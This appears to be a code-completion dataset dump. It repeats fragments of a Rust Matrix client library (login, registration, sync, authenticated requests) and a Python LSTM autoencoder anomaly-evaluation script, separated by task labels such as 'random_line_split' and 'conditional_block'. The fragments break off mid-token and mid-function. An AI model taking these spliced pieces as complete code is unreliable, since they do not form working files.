impl<C> Client<C>
where
C: Connect + 'static,
{
/// Creates a new client using the given `hyper::Client`.
///
/// This allows the user to configure the details of HTTP as desired.
pub fn custom(
hyper_client: HyperClient<C>,
homeserver_url: Url,
session: Option<Session>,
) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: hyper_client,
session: Mutex::new(session),
}))
}
/// Log in with a username and password.
///
/// In contrast to api::r0::session::login::call(), this method stores the
/// session data returned by the endpoint in this client, instead of
/// returning it.
pub fn log_in(
&self,
user: String,
password: String,
device_id: Option<String>,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::session::login;
let data = self.0.clone();
login::call(
self.clone(),
login::Request {
address: None,
login_type: login::LoginType::Password,
medium: None,
device_id,
password,
user,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a guest. In contrast to api::r0::account::register::call(),
/// this method stores the session data returned by the endpoint in this
/// client, instead of returning it.
pub fn register_guest(&self) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::Guest),
password: None,
username: None,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a new user on this server.
///
/// In contrast to api::r0::account::register::call(), this method stores
/// the session data returned by the endpoint in this client, instead of
/// returning it.
///
/// The username is the local part of the returned user_id. If it is
/// omitted from this request, the server will generate one.
pub fn register_user(
&self,
username: Option<String>,
password: String,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::User),
password: Some(password),
username,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Convenience method that represents repeated calls to the sync_events endpoint as a stream.
///
/// If the since parameter is None, the first Item might take a significant time to arrive and
/// be deserialized, because it contains all events that have occured in the whole lifetime of
/// the logged-in users account and are visible to them.
pub fn sync(
&self,
filter: Option<api::r0::sync::sync_events::Filter>, | since: Option<String>, | random_line_split | |
lib.rs | Request` type. `call` will return a future that will
//! resolve to the relevant `Response` type.
//!
//! For example:
//!
//! ```no_run
//! # use futures::Future;
//! # use ruma_client::Client;
//! # let homeserver_url = "https://example.com".parse().unwrap();
//! # let client = Client::https(homeserver_url, None).unwrap();
//! use std::convert::TryFrom;
//!
//! use ruma_client::api::r0::alias::get_alias;
//! use ruma_identifiers::{RoomAliasId, RoomId};
//!
//! let request = get_alias::Request {
//! room_alias: RoomAliasId::try_from("#example_room:example.com").unwrap(),
//! };
//!
//! let work = get_alias::call(client, request).and_then(|response| {
//! assert_eq!(response.room_id, RoomId::try_from("!n8f893n9:example.com").unwrap());
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
#![deny(
missing_copy_implementations,
missing_debug_implementations,
missing_docs,
warnings
)]
#![warn(
clippy::empty_line_after_outer_attr,
clippy::expl_impl_clone_on_copy,
clippy::if_not_else,
clippy::items_after_statements,
clippy::match_same_arms,
clippy::mem_forget,
clippy::missing_docs_in_private_items,
clippy::mut_mut,
clippy::needless_borrow,
clippy::needless_continue,
clippy::single_match_else,
clippy::unicode_not_nfc,
clippy::use_self,
clippy::used_underscore_binding,
clippy::wrong_pub_self_convention,
clippy::wrong_self_convention
)]
use std::{
convert::TryInto,
str::FromStr,
sync::{Arc, Mutex},
};
use futures::{
future::{Future, FutureFrom, IntoFuture},
stream::{self, Stream},
};
use hyper::{
client::{connect::Connect, HttpConnector},
Client as HyperClient, Uri,
};
#[cfg(feature = "hyper-tls")]
use hyper_tls::HttpsConnector;
#[cfg(feature = "hyper-tls")]
use native_tls::Error as NativeTlsError;
use ruma_api::Endpoint;
use url::Url;
use crate::error::InnerError;
pub use crate::{error::Error, session::Session};
/// Matrix client-server API endpoints.
pub mod api;
mod error;
mod session;
/// A client for the Matrix client-server API.
#[derive(Debug)]
pub struct Client<C: Connect>(Arc<ClientData<C>>);
/// Data contained in Client's Rc
#[derive(Debug)]
struct ClientData<C>
where
C: Connect,
{
/// The URL of the homeserver to connect to.
homeserver_url: Url,
/// The underlying HTTP client.
hyper: HyperClient<C>,
/// User session data.
session: Mutex<Option<Session>>,
}
impl Client<HttpConnector> {
/// Creates a new client for making HTTP requests to the given homeserver.
pub fn new(homeserver_url: Url, session: Option<Session>) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: HyperClient::builder().keep_alive(true).build_http(),
session: Mutex::new(session),
}))
}
/// Get a copy of the current `Session`, if any.
///
/// Useful for serializing and persisting the session to be restored later.
pub fn session(&self) -> Option<Session> {
self.0
.session
.lock()
.expect("session mutex was poisoned")
.clone()
}
}
#[cfg(feature = "tls")]
impl Client<HttpsConnector<HttpConnector>> {
/// Creates a new client for making HTTPS requests to the given homeserver.
pub fn https(homeserver_url: Url, session: Option<Session>) -> Result<Self, NativeTlsError> {
let connector = HttpsConnector::new(4)?;
Ok(Self(Arc::new(ClientData {
homeserver_url,
hyper: { HyperClient::builder().keep_alive(true).build(connector) },
session: Mutex::new(session),
})))
}
}
impl<C> Client<C>
where
C: Connect + 'static,
{
/// Creates a new client using the given `hyper::Client`.
///
/// This allows the user to configure the details of HTTP as desired.
pub fn custom(
hyper_client: HyperClient<C>,
homeserver_url: Url,
session: Option<Session>,
) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: hyper_client,
session: Mutex::new(session),
}))
}
/// Log in with a username and password.
///
/// In contrast to api::r0::session::login::call(), this method stores the
/// session data returned by the endpoint in this client, instead of
/// returning it.
pub fn log_in(
&self,
user: String,
password: String,
device_id: Option<String>,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::session::login;
let data = self.0.clone();
login::call(
self.clone(),
login::Request {
address: None,
login_type: login::LoginType::Password,
medium: None,
device_id,
password,
user,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a guest. In contrast to api::r0::account::register::call(),
/// this method stores the session data returned by the endpoint in this
/// client, instead of returning it.
pub fn register_guest(&self) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::Guest),
password: None,
username: None,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a new user on this server.
///
/// In contrast to api::r0::account::register::call(), this method stores
/// the session data returned by the endpoint in this client, instead of
/// returning it.
///
/// The username is the local part of the returned user_id. If it is
/// omitted from this request, the server will generate one.
pub fn register_user(
&self,
username: Option<String>,
password: String,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::User),
password: Some(password),
username,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Convenience method that represents repeated calls to the sync_events endpoint as a stream.
///
/// If the since parameter is None, the first Item might take a significant time to arrive and
/// be deserialized, because it contains all events that have occured in the whole lifetime of
/// the logged-in users account and are visible to them.
pub fn sync(
&self,
filter: Option<api::r0::sync::sync_events::Filter>,
since: Option<String>,
set_presence: bool,
) -> impl Stream<Item = api::r0::sync::sync_events::Response, Error = Error> {
use crate::api::r0::sync::sync_events;
let client = self.clone();
let set_presence = if set_presence {
None
} else {
Some(sync_events::SetPresence::Offline)
};
stream::unfold(since, move |since| {
Some(
sync_events::call(
client.clone(),
sync_events::Request {
filter: filter.clone(),
since,
full_state: None,
set_presence: set_presence.clone(),
timeout: None,
},
)
.map(|res| {
let next_batch_clone = res.next_batch.clone();
(res, Some(next_batch_clone))
}),
)
})
}
/// Makes a request to a Matrix API endpoint.
pub(crate) fn | request | identifier_name | |
lib.rs | f893n9:example.com").unwrap());
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
#![deny(
missing_copy_implementations,
missing_debug_implementations,
missing_docs,
warnings
)]
#![warn(
clippy::empty_line_after_outer_attr,
clippy::expl_impl_clone_on_copy,
clippy::if_not_else,
clippy::items_after_statements,
clippy::match_same_arms,
clippy::mem_forget,
clippy::missing_docs_in_private_items,
clippy::mut_mut,
clippy::needless_borrow,
clippy::needless_continue,
clippy::single_match_else,
clippy::unicode_not_nfc,
clippy::use_self,
clippy::used_underscore_binding,
clippy::wrong_pub_self_convention,
clippy::wrong_self_convention
)]
use std::{
convert::TryInto,
str::FromStr,
sync::{Arc, Mutex},
};
use futures::{
future::{Future, FutureFrom, IntoFuture},
stream::{self, Stream},
};
use hyper::{
client::{connect::Connect, HttpConnector},
Client as HyperClient, Uri,
};
#[cfg(feature = "hyper-tls")]
use hyper_tls::HttpsConnector;
#[cfg(feature = "hyper-tls")]
use native_tls::Error as NativeTlsError;
use ruma_api::Endpoint;
use url::Url;
use crate::error::InnerError;
pub use crate::{error::Error, session::Session};
/// Matrix client-server API endpoints.
pub mod api;
mod error;
mod session;
/// A client for the Matrix client-server API.
#[derive(Debug)]
pub struct Client<C: Connect>(Arc<ClientData<C>>);
/// Data contained in Client's Rc
#[derive(Debug)]
struct ClientData<C>
where
C: Connect,
{
/// The URL of the homeserver to connect to.
homeserver_url: Url,
/// The underlying HTTP client.
hyper: HyperClient<C>,
/// User session data.
session: Mutex<Option<Session>>,
}
impl Client<HttpConnector> {
/// Creates a new client for making HTTP requests to the given homeserver.
pub fn new(homeserver_url: Url, session: Option<Session>) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: HyperClient::builder().keep_alive(true).build_http(),
session: Mutex::new(session),
}))
}
/// Get a copy of the current `Session`, if any.
///
/// Useful for serializing and persisting the session to be restored later.
pub fn session(&self) -> Option<Session> {
self.0
.session
.lock()
.expect("session mutex was poisoned")
.clone()
}
}
#[cfg(feature = "tls")]
impl Client<HttpsConnector<HttpConnector>> {
/// Creates a new client for making HTTPS requests to the given homeserver.
pub fn https(homeserver_url: Url, session: Option<Session>) -> Result<Self, NativeTlsError> {
let connector = HttpsConnector::new(4)?;
Ok(Self(Arc::new(ClientData {
homeserver_url,
hyper: { HyperClient::builder().keep_alive(true).build(connector) },
session: Mutex::new(session),
})))
}
}
impl<C> Client<C>
where
C: Connect + 'static,
{
/// Creates a new client using the given `hyper::Client`.
///
/// This allows the user to configure the details of HTTP as desired.
pub fn custom(
hyper_client: HyperClient<C>,
homeserver_url: Url,
session: Option<Session>,
) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: hyper_client,
session: Mutex::new(session),
}))
}
/// Log in with a username and password.
///
/// In contrast to api::r0::session::login::call(), this method stores the
/// session data returned by the endpoint in this client, instead of
/// returning it.
pub fn log_in(
&self,
user: String,
password: String,
device_id: Option<String>,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::session::login;
let data = self.0.clone();
login::call(
self.clone(),
login::Request {
address: None,
login_type: login::LoginType::Password,
medium: None,
device_id,
password,
user,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a guest. In contrast to api::r0::account::register::call(),
/// this method stores the session data returned by the endpoint in this
/// client, instead of returning it.
pub fn register_guest(&self) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::Guest),
password: None,
username: None,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a new user on this server.
///
/// In contrast to api::r0::account::register::call(), this method stores
/// the session data returned by the endpoint in this client, instead of
/// returning it.
///
/// The username is the local part of the returned user_id. If it is
/// omitted from this request, the server will generate one.
pub fn register_user(
&self,
username: Option<String>,
password: String,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::User),
password: Some(password),
username,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Convenience method that represents repeated calls to the sync_events endpoint as a stream.
///
/// If the since parameter is None, the first Item might take a significant time to arrive and
/// be deserialized, because it contains all events that have occured in the whole lifetime of
/// the logged-in users account and are visible to them.
pub fn sync(
&self,
filter: Option<api::r0::sync::sync_events::Filter>,
since: Option<String>,
set_presence: bool,
) -> impl Stream<Item = api::r0::sync::sync_events::Response, Error = Error> {
use crate::api::r0::sync::sync_events;
let client = self.clone();
let set_presence = if set_presence {
None
} else {
Some(sync_events::SetPresence::Offline)
};
stream::unfold(since, move |since| {
Some(
sync_events::call(
client.clone(),
sync_events::Request {
filter: filter.clone(),
since,
full_state: None,
set_presence: set_presence.clone(),
timeout: None,
},
)
.map(|res| {
let next_batch_clone = res.next_batch.clone();
(res, Some(next_batch_clone))
}),
)
})
}
/// Makes a request to a Matrix API endpoint.
pub(crate) fn request<E>(
self,
request: <E as Endpoint>::Request,
) -> impl Future<Item = E::Response, Error = Error>
where
E: Endpoint,
{
let data1 = self.0.clone();
let data2 = self.0.clone();
let mut url = self.0.homeserver_url.clone();
request
.try_into()
.map_err(Error::from)
.into_future()
.and_then(move |hyper_request| {
{
let uri = hyper_request.uri();
url.set_path(uri.path());
url.set_query(uri.query());
if E::METADATA.requires_authentication | {
if let Some(ref session) = *data1.session.lock().unwrap() {
url.query_pairs_mut()
.append_pair("access_token", &session.access_token);
} else {
return Err(Error(InnerError::AuthenticationRequired));
}
} | conditional_block | |
AutoEncoderBasedEvaluation.py | (stable, self.wantToShuffle)
# remove some data for reshaping
trainDataMissing = trainData.shape[0] % self.windowSize
validationDataMissing = validationData.shape[0] % self.windowSize
if trainDataMissing != 0:
trainData = trainData[: -trainDataMissing]
if validationDataMissing != 0:
validationData = validationData[: -validationDataMissing]
# plot dataset [optional]
print("data shape:", trainData.shape, validationData.shape)
plt.plot(trainData, label="train")
plt.plot(validationData, label="validate")
plt.legend()
# plt.show()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_train_valid_data.png')
plt.close()
# reshape inputs [timesteps, samples] into subsequence (sliding window)
trainData = trainData.reshape(-1, self.windowSize) # 12(window)
validationData = validationData.reshape(-1, self.windowSize)
print("data shape:", trainData.shape, validationData.shape)
# collect mean, std
meanOfTrainData, stdOfTrainData = self.collectMeanStd(trainData)
meanOfValidationData, stdOfValidationData = self.collectMeanStd(validationData)
meanOfTrainData += meanOfValidationData
stdOfTrainData += stdOfValidationData
# find cycle of repeated trend
cycle = self.findCycle(stable)
# save statistic values [left tail, right tail, right tail(std), cycle]
self.statistics = {'lowerMean': np.percentile(meanOfTrainData, 5),
'upperMean': np.percentile(meanOfTrainData, 95),
'upperStd': np.percentile(stdOfTrainData, 95), 'cycle': cycle}
# flatten dataset and min-max normalize
trainData = minMaxScaler.transform(trainData.reshape(-1, 1))
validationData = minMaxScaler.transform(validationData.reshape(-1, 1))
# reshape inputs [timesteps, samples] into subsequence (sliding window)
trainData = trainData.reshape(-1, self.windowSize)
validationData = validationData.reshape(-1, self.windowSize)
trainDataTensor, lengthOfSubsequence, numberOfFeatures = self.convertToTensor(trainData)
validationDataTensor, _, _ = self.convertToTensor(validationData)
return trainDataTensor, validationDataTensor, lengthOfSubsequence, numberOfFeatures
@staticmethod
def findCycle(sequence):
normalizedStable = sequence - np.mean(sequence)
# acf = sm.tsa.acf(normalizedStable, nlags=len(normalizedStable), fft=False) # auto correlation
peaks, _ = find_peaks(normalizedStable.to_numpy().flatten())
if peaks.size < 3:
return None
cycle = np.mean(np.diff(peaks))
return cycle
@staticmethod
def convertToTensor(dataset):
dataset = [torch.tensor(s).unsqueeze(1).float() for s in dataset]
# N, windowSize, 1
numberOfSequences, lengthOfSubsequence, numberOfFeatures = torch.stack(dataset).shape
return dataset, lengthOfSubsequence, numberOfFeatures
@staticmethod
def collectMeanStd(dataset):
meanList, stdList = [], []
for seq in dataset:
meanList.append(seq.mean())
stdList.append(seq.std())
return meanList, stdList
def train(self, train, valid, lengthOfSubsequence, numberOfFeatures):
model = LstmAutoEncoder(lengthOfSubsequence, numberOfFeatures, 128) # why 128??? example 이 140이어서?
model = model.to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=self.learningRate)
criterion = nn.L1Loss(reduction='sum').to(device)
bestModel = copy.deepcopy(model.state_dict())
bestLoss = np.inf
# early stop epoch: 10% of max epoch
earlyStopThreshold = self.maxEpoch * 0.1
countWithoutImprovement = 0
for epoch in range(1, self.maxEpoch + 1):
model = model.train()
trainLossList = []
for seqTrue in train:
optimizer.zero_grad()
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
loss.backward()
optimizer.step()
trainLossList.append(loss.item())
validLossList = []
model = model.eval()
with torch.no_grad():
for seqTrue in valid:
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
validLossList.append(loss.item())
MeanOfTrainLoss = np.mean(trainLossList)
MeanOfValidLoss = np.mean(validLossList)
if MeanOfValidLoss < bestLoss:
countWithoutImprovement = 0
bestLoss = MeanOfValidLoss
bestModel = copy.deepcopy(model.state_dict())
else:
countWit | if epoch >= 50 and countWithoutImprovement == earlyStopThreshold:
print('Early stopping!')
break
print(f'Epoch {epoch}: train loss {MeanOfTrainLoss} val loss {MeanOfValidLoss}')
model.load_state_dict(bestModel)
# plot result [optional]
fig, axs = plt.subplots(
nrows=2,
ncols=6,
sharex=True,
sharey=True,
figsize=(16, 8)
)
for i, data in enumerate(train[:6]):
self.plotPrediction(data, model, title='Train', ax=axs [0, i])
for i, data in enumerate(valid[:6]):
self.plotPrediction(data, model, title='Valid', ax=axs [1, i])
fig.tight_layout()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_train_result.png')
plt.close()
return model
def setThreshold(self, autoEncoder, train, valid):
_, trainLosses = self.predict(autoEncoder, train)
_, validLosses = self.predict(autoEncoder, valid)
# plot loss distribution [optional]
sns.distplot(trainLosses, bins=50, kde=True)
sns.distplot(validLosses, bins=50, kde=True)
self.threshold = np.percentile(validLosses, 95)
self.statistics['threshold'] = self.threshold
@staticmethod
def predict(autoEncoder, dataset):
predictions, losses = [], []
criterion = nn.L1Loss(reduction='sum').to(device)
with torch.no_grad():
autoEncoder = autoEncoder.eval()
for seqTrue in dataset:
seqTrue = seqTrue.to(device)
seqPrediction = autoEncoder(seqTrue)
loss = criterion(seqPrediction, seqTrue)
predictions.append(seqPrediction.cpu().numpy().flatten())
losses.append(loss.item())
return predictions, losses
def saveModel(self, autoEncoder):
np.save('./model/' + str(self.paramIndex) + '_ae_statistics', self.statistics)
path = './model/' + str(self.paramIndex) + '_lstm_ae_model.pth'
torch.save(autoEncoder, path)
def loadModel(self):
self.statistics = np.load('./model/' + str(self.paramIndex) + '_ae_statistics.npy', allow_pickle=True).item()
self.threshold = self.statistics['threshold']
autoEncoder = torch.load('./model/' + str(self.paramIndex) + '_lstm_ae_model.pth')
autoEncoder = autoEncoder.to(device)
return autoEncoder
def evaluate(self, autoEncoder):
stable = self.normalData.data.x_data
unstable = self.unstableData.data.x_data
minMaxScaler = MinMaxScaler()
minMaxScaler.fit(stable)
stableStarted = len(unstable) - self.windowSize
originWindowSize = self.windowSize
# wait for finding the cycle
cycle, waitTime = None, 0
for i in range(stableStarted):
cycle = self.findCycle(unstable[: i + self.windowSize])
if cycle is None:
continue
else:
waitTime = i + 1
break
if i == stableStarted - 1:
cycle = originWindowSize
originCycle = self.statistics['cycle']
if (cycle / originCycle) > 1:
self.threshold *= (cycle / originCycle)
elif (cycle / originCycle) < 1:
self.threshold *= 1 / (cycle / originCycle)
else:
pass
isWindowChanged = False
for i in range(len(unstable) - self.windowSize - waitTime):
i += waitTime
# sliding window
subSequence = unstable[i: i + self.windowSize]
# re-sampling (normal vs. unstable)
if cycle > originCycle and isWindowChanged is False:
self.windowSize = np.int(np.round(self.windowSize * (cycle / originCycle), 0))
isWindowChanged = True
continue
reSampledSeq = signal.resample(subSequence, np.int(np.round(len(subSequence) * np.float(originCycle / cycle))))
reSampledSeq = reSampledSeq[:originWindowSize]
mean, std = reSampledSeq.mean(), reSampledSeq.std()
# flatten dataset and min-max normalize
reSampledSeq | houtImprovement += 1
| conditional_block |
AutoEncoderBasedEvaluation.py | .divideData(stable, self.wantToShuffle)
# remove some data for reshaping
trainDataMissing = trainData.shape[0] % self.windowSize
validationDataMissing = validationData.shape[0] % self.windowSize
if trainDataMissing != 0:
trainData = trainData[: -trainDataMissing]
if validationDataMissing != 0:
validationData = validationData[: -validationDataMissing]
# plot dataset [optional]
print("data shape:", trainData.shape, validationData.shape)
plt.plot(trainData, label="train")
plt.plot(validationData, label="validate")
plt.legend()
# plt.show()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_train_valid_data.png')
plt.close()
# reshape inputs [timesteps, samples] into subsequence (sliding window)
trainData = trainData.reshape(-1, self.windowSize) # 12(window)
validationData = validationData.reshape(-1, self.windowSize)
print("data shape:", trainData.shape, validationData.shape)
# collect mean, std
meanOfTrainData, stdOfTrainData = self.collectMeanStd(trainData)
meanOfValidationData, stdOfValidationData = self.collectMeanStd(validationData)
meanOfTrainData += meanOfValidationData
stdOfTrainData += stdOfValidationData
# find cycle of repeated trend
cycle = self.findCycle(stable)
# save statistic values [left tail, right tail, right tail(std), cycle]
self.statistics = {'lowerMean': np.percentile(meanOfTrainData, 5),
'upperMean': np.percentile(meanOfTrainData, 95),
'upperStd': np.percentile(stdOfTrainData, 95), 'cycle': cycle}
# flatten dataset and min-max normalize
trainData = minMaxScaler.transform(trainData.reshape(-1, 1))
validationData = minMaxScaler.transform(validationData.reshape(-1, 1))
# reshape inputs [timesteps, samples] into subsequence (sliding window)
trainData = trainData.reshape(-1, self.windowSize)
validationData = validationData.reshape(-1, self.windowSize)
trainDataTensor, lengthOfSubsequence, numberOfFeatures = self.convertToTensor(trainData)
validationDataTensor, _, _ = self.convertToTensor(validationData)
return trainDataTensor, validationDataTensor, lengthOfSubsequence, numberOfFeatures
@staticmethod
def findCycle(sequence):
normalizedStable = sequence - np.mean(sequence)
# acf = sm.tsa.acf(normalizedStable, nlags=len(normalizedStable), fft=False) # auto correlation
peaks, _ = find_peaks(normalizedStable.to_numpy().flatten())
if peaks.size < 3:
return None
cycle = np.mean(np.diff(peaks))
return cycle
@staticmethod
def convertToTensor(dataset):
dataset = [torch.tensor(s).unsqueeze(1).float() for s in dataset]
# N, windowSize, 1
numberOfSequences, lengthOfSubsequence, numberOfFeatures = torch.stack(dataset).shape
return dataset, lengthOfSubsequence, numberOfFeatures
@staticmethod
def collectMeanStd(dataset):
meanList, stdList = [], []
for seq in dataset:
meanList.append(seq.mean())
stdList.append(seq.std())
return meanList, stdList
def train(self, train, valid, lengthOfSubsequence, numberOfFeatures):
model = LstmAutoEncoder(lengthOfSubsequence, numberOfFeatures, 128) # why 128??? example 이 140이어서?
model = model.to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=self.learningRate)
criterion = nn.L1Loss(reduction='sum').to(device)
bestModel = copy.deepcopy(model.state_dict())
bestLoss = np.inf
# early stop epoch: 10% of max epoch
earlyStopThreshold = self.maxEpoch * 0.1
countWithoutImprovement = 0
for epoch in range(1, self.maxEpoch + 1):
model = model.train()
trainLossList = []
for seqTrue in train:
optimizer.zero_grad()
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
loss.backward()
optimizer.step()
trainLossList.append(loss.item())
validLossList = []
model = model.eval()
with torch.no_grad():
for seqTrue in valid:
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
validLossList.append(loss.item())
MeanOfTrainLoss = np.mean(trainLossList)
MeanOfValidLoss = np.mean(validLossList)
if MeanOfValidLoss < bestLoss:
countWithoutImprovement = 0
bestLoss = MeanOfValidLoss
bestModel = copy.deepcopy(model.state_dict())
else:
countWithoutImprovement += 1
if epoch >= 50 and countWithoutImprovement == earlyStopThreshold:
print('Early stopping!')
break
print(f'Epoch {epoch}: train loss {MeanOfTrainLoss} val loss {MeanOfValidLoss}')
model.load_state_dict(bestModel)
# plot result [optional]
fig, axs = plt.subplots(
nrows=2,
ncols=6,
sharex=True,
sharey=True,
figsize=(16, 8)
)
for i, data in enumerate(train[:6]):
self.plotPrediction(data, model, title='Train', ax=axs [0, i])
for i, data in enumerate(valid[:6]):
self.plotPrediction(data, model, title='Valid', ax=axs [1, i])
fig.tight_layout()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_train_result.png')
plt.close()
return model
def setThreshold(self, autoEncoder, train, valid):
_, trainLosses = self.predict(autoEncoder, train)
_, validLosses = self.predict(autoEncoder, valid)
# plot loss distribution [optional]
sns.distplot(trainLosses, bins=50, kde=True)
sns.distplot(validLosses, bins=50, kde=True)
self.threshold = np.percentile(validLosses, 95)
self.statistics['threshold'] = self.threshold
@staticmethod
def predict(autoEncoder, dataset):
predictions, losses = [], []
criterion = nn.L1Loss(reduction='sum').to(device)
with torch.no_grad():
autoEncoder = autoEncoder.eval()
for seqTrue in dataset:
seqTrue = seqTrue.to(device)
seqPrediction = autoEncoder(seqTrue)
loss = criterion(seqPrediction, seqTrue)
predictions.append(seqPrediction.cpu().numpy().flatten())
losses.append(loss.item())
return predictions, losses |
def saveModel(self, autoEncoder):
np.save('./model/' + str(self.paramIndex) + '_ae_statistics', self.statistics)
path = './model/' + str(self.paramIndex) + '_lstm_ae_model.pth'
torch.save(autoEncoder, path)
def loadModel(self):
self.statistics = np.load('./model/' + str(self.paramIndex) + '_ae_statistics.npy', allow_pickle=True).item()
self.threshold = self.statistics['threshold']
autoEncoder = torch.load('./model/' + str(self.paramIndex) + '_lstm_ae_model.pth')
autoEncoder = autoEncoder.to(device)
return autoEncoder
def evaluate(self, autoEncoder):
stable = self.normalData.data.x_data
unstable = self.unstableData.data.x_data
minMaxScaler = MinMaxScaler()
minMaxScaler.fit(stable)
stableStarted = len(unstable) - self.windowSize
originWindowSize = self.windowSize
# wait for finding the cycle
cycle, waitTime = None, 0
for i in range(stableStarted):
cycle = self.findCycle(unstable[: i + self.windowSize])
if cycle is None:
continue
else:
waitTime = i + 1
break
if i == stableStarted - 1:
cycle = originWindowSize
originCycle = self.statistics['cycle']
if (cycle / originCycle) > 1:
self.threshold *= (cycle / originCycle)
elif (cycle / originCycle) < 1:
self.threshold *= 1 / (cycle / originCycle)
else:
pass
isWindowChanged = False
for i in range(len(unstable) - self.windowSize - waitTime):
i += waitTime
# sliding window
subSequence = unstable[i: i + self.windowSize]
# re-sampling (normal vs. unstable)
if cycle > originCycle and isWindowChanged is False:
self.windowSize = np.int(np.round(self.windowSize * (cycle / originCycle), 0))
isWindowChanged = True
continue
reSampledSeq = signal.resample(subSequence, np.int(np.round(len(subSequence) * np.float(originCycle / cycle))))
reSampledSeq = reSampledSeq[:originWindowSize]
mean, std = reSampledSeq.mean(), reSampledSeq.std()
# flatten dataset and min-max normalize
reSampledSeq = min | random_line_split | |
AutoEncoderBasedEvaluation.py | 95),
'upperStd': np.percentile(stdOfTrainData, 95), 'cycle': cycle}
# flatten dataset and min-max normalize
trainData = minMaxScaler.transform(trainData.reshape(-1, 1))
validationData = minMaxScaler.transform(validationData.reshape(-1, 1))
# reshape inputs [timesteps, samples] into subsequence (sliding window)
trainData = trainData.reshape(-1, self.windowSize)
validationData = validationData.reshape(-1, self.windowSize)
trainDataTensor, lengthOfSubsequence, numberOfFeatures = self.convertToTensor(trainData)
validationDataTensor, _, _ = self.convertToTensor(validationData)
return trainDataTensor, validationDataTensor, lengthOfSubsequence, numberOfFeatures
@staticmethod
def findCycle(sequence):
normalizedStable = sequence - np.mean(sequence)
# acf = sm.tsa.acf(normalizedStable, nlags=len(normalizedStable), fft=False) # auto correlation
peaks, _ = find_peaks(normalizedStable.to_numpy().flatten())
if peaks.size < 3:
return None
cycle = np.mean(np.diff(peaks))
return cycle
@staticmethod
def convertToTensor(dataset):
dataset = [torch.tensor(s).unsqueeze(1).float() for s in dataset]
# N, windowSize, 1
numberOfSequences, lengthOfSubsequence, numberOfFeatures = torch.stack(dataset).shape
return dataset, lengthOfSubsequence, numberOfFeatures
@staticmethod
def collectMeanStd(dataset):
meanList, stdList = [], []
for seq in dataset:
meanList.append(seq.mean())
stdList.append(seq.std())
return meanList, stdList
def train(self, train, valid, lengthOfSubsequence, numberOfFeatures):
model = LstmAutoEncoder(lengthOfSubsequence, numberOfFeatures, 128) # why 128??? example 이 140이어서?
model = model.to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=self.learningRate)
